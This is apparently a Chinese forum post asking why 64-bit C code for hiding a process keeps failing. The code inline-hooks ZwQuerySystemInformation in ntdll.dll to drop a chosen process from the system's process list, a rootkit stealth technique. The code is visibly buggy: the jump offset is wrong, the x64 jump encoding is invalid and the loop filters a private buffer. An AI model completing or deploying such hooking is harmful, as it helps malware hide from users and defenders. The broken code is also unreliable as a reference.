进程隐藏，下面代码总是出写入错误。我感觉是FunHook函数有问题，有没有什么问题呀？

```c

BOOL FunHook(LPCSTR OldFunName,LPVOID lpNewFun,PBYTE OldData,PBYTE NewData,LPCWSTR szModule)
{
    DWORD dwProtect;
    LONGLONG dwRelative;
    byte pbuf[9]={0xe9,0,};
    PBYTE pByte;
    LPVOID lpZwQuerySystemInformation=GetProcAddress(GetModuleHandle(szModule),OldFunName);
    pByte=(PBYTE)lpZwQuerySystemInformation;
    if (pByte[0]==0xe9)
    {
        MESSAGEBOX(L"The Fun has been hooked!");
        return FALSE;
    }
    if (!lpZwQuerySystemInformation)
    {
        MESSAGEBOX(L"Fun Hook Failed");
        return FALSE;
    }
    if (!NewData||!OldData){MESSAGEBOX(L"Data parameter transmission error!");return FALSE;}
    VirtualProtect(lpZwQuerySystemInformation,9,PAGE_EXECUTE_READWRITE,&dwProtect);
    MESSAGEBOX(L"VirtualProtect ");
    memcpy(OldData,pByte,9);
    NewData[0]=0xe9;
    dwRelative=(LONGLONG)lpNewFun-(LONGLONG)OldFunName+9;
    memcpy(NewData+1,&dwRelative,8);
    memcpy(pByte,NewData,9);
    VirtualProtect(lpZwQuerySystemInformation,9,dwProtect,&dwProtect);
    MESSAGEBOX(L"VirtualProtect Finished");
    return TRUE;
}
NTSTATUS NewZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass,
                                     PVOID SystemInformation,
                                     ULONG SystemInfoemationLength,
                                     PULONG ReturnLength) //新函数
{
    NTSTATUS status;
    DWORD dwSizeNeed;
    LPVOID lpZwQuerySystemInformation=GetProcAddress(GetModuleHandle(L"ntdll.dll"),"ZwQuerySystemInformation");
    status=FunUnhook("ZwQuerySystemInformation",NewZwQuerySystemInformation,lpOldData,L"ntdll.dll");
    status=((ZWQUERYSYSTEMINFORMATION)lpZwQuerySystemInformation)(SystemProcessesAndThreadsInformation,NULL,0,&dwSizeNeed);
    if (status==0xc0000004)
    {
        MESSAGEBOX(L"进入if (status==0xc0000004)");
        PSYSTEM_PROCESS_INFORMATION proar,pforward;
        BYTE *buffer=new BYTE[dwSizeNeed];
        status=((ZWQUERYSYSTEMINFORMATION)lpZwQuerySystemInformation)(SystemProcessesAndThreadsInformation,(PVOID)buffer,dwSizeNeed,NULL);
        if (status==0)
        {
            proar = (PSYSTEM_PROCESS_INFORMATION)buffer;
            do {  
                proar=(PSYSTEM_PROCESS_INFORMATION)((LONGLONG)proar+proar->NextEntryOffset);
                if ((DWORD)proar->UniqueProcessId==dwProcessid)
                {
                    if (proar->NextEntryOffset==0)
                    {
                        pforward->NextEntryOffset=0;
                    }else
                    {
                        pforward->NextEntryOffset+=proar->NextEntryOffset;
                    }
                }
                pforward=proar;
                if (proar->NextEntryOffset==0)
                {
                    break;
                }
                proar=(PSYSTEM_PROCESS_INFORMATION)((LONGLONG)proar+proar->NextEntryOffset);
            } while ( proar->NextEntryOffset != 0 );
        }
        delete []buffer;
        buffer=NULL;
    }
    FunHook("ZwQuerySystemInformation",NewZwQuerySystemInformation,lpOldData,lpNewData,L"ntdll.dll");
    return status;
}

```

以上是64位程序，不是32位